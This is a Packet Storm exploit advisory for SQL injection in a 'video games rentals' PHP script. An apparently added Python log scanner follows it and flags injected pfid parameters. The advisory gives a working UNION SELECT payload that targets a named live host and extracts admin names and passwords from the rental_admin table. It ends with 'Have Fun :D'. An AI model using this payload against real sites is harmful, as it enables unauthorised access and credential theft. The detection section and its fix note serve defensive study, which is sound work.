Video Games Rentals Script SQL Injection

2010-02-12T00:00:00
ID PACKETSTORM:86215
Type packetstorm
Reporter JaMbA
Modified 2010-02-12T00:00:00

Description

                                        
                                            `  
  
# Exploit Title: video games rentals Script SQL injection Vulnerability  
# Date: 11/02/2010  
# Author: JaMbA  
# Software Link: N/A  
# Version: all version  
# Tested on: Windows & Linux  
# CVE : ()  
  
:::::::::::::::::::::::::  
  
Exploit Title : video games rentals Script SQL injection Vulnerability  
  
Author : JaMbA  
  
Script Site : www.commodityrentals.com  
  
Version : All Versions  
  
Tested on : Windows & Linux  
  
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::  
  
:::::::::::::::::::::::::  
  
=====================================Exploit===============  
  
=========================  
  
[ EXPL0!T ]  
  
www.[Server].com/[Path]/index.php?view=catalog&pfid=5[exploit code]&item_type=G  
  
[ D3M0 ]  
  
http://videogames.commodityrentals.com/index.php?view=catalog&pfid=-5+union+select+1,concat(admin_name,0x3a,admin_password),3,4,5+from+rental_admin--&item_type=G  
  
  
Have Fun :D  
  
===========================================================  
  
=========================  
  
Greetz to : Alnjm33-virus-pal - Predator-bingo2 - xXx-jago-dz -inejcteur-4PY-SaYrOs- XR57 -Tr0y-x Ahmadso -alsaek  
=== 3SI lycee jbel jloud ====  
  
  
  
  
  
  
`
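A detection check for the request pattern shown in the advisory, added here as an example and not part of the original post: it scans web-server access logs for `pfid` values that are not plain integers and labels any SQL tokens found. The combined log format, the integer-only rule for `pfid`, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate pfid is a plain non-negative integer (the advisory shows pfid=5).
VALID_PFID = re.compile(r'\d+')
# Tokens used only to label a finding; any non-integer pfid is flagged regardless.
SQL_TOKENS = re.compile(r'\b(union|select|concat|from)\b|--|/\*|0x[0-9a-f]+', re.I)

def check_line(line):
    """Return a finding dict if the line carries a non-integer pfid, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    # parse_qs percent-decodes and turns '+' into spaces, so encoded values are normalised.
    params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
    for value in params.get("pfid", []):
        if not VALID_PFID.fullmatch(value):
            tokens = sorted({t.group(0).lower() for t in SQL_TOKENS.finditer(value)})
            return {"client": line.split(" ", 1)[0], "pfid": value, "sql_tokens": tokens}
    return None

def scan(lines):
    """Run check_line over an iterable of log lines and keep only the findings."""
    return [f for f in map(check_line, lines) if f]

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Feb/2010:10:01:02 +0000] "GET /index.php?view=catalog&pfid=5&item_type=G HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Feb/2010:10:03:44 +0000] "GET /index.php?view=catalog&pfid=-5+union+select+1,2,3,4,5--&item_type=G HTTP/1.1" 200 4811 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Feb/2010:10:04:10 +0000] "GET /index.php?view=catalog&pfid=5%27&item_type=G HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Feb/2010:10:05:00 +0000] "GET /index.php?view=cart HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule applied at the application layer (casting or validating `pfid` before it reaches the query, together with parameterized statements) closes the injection point; the log check only surfaces attempts.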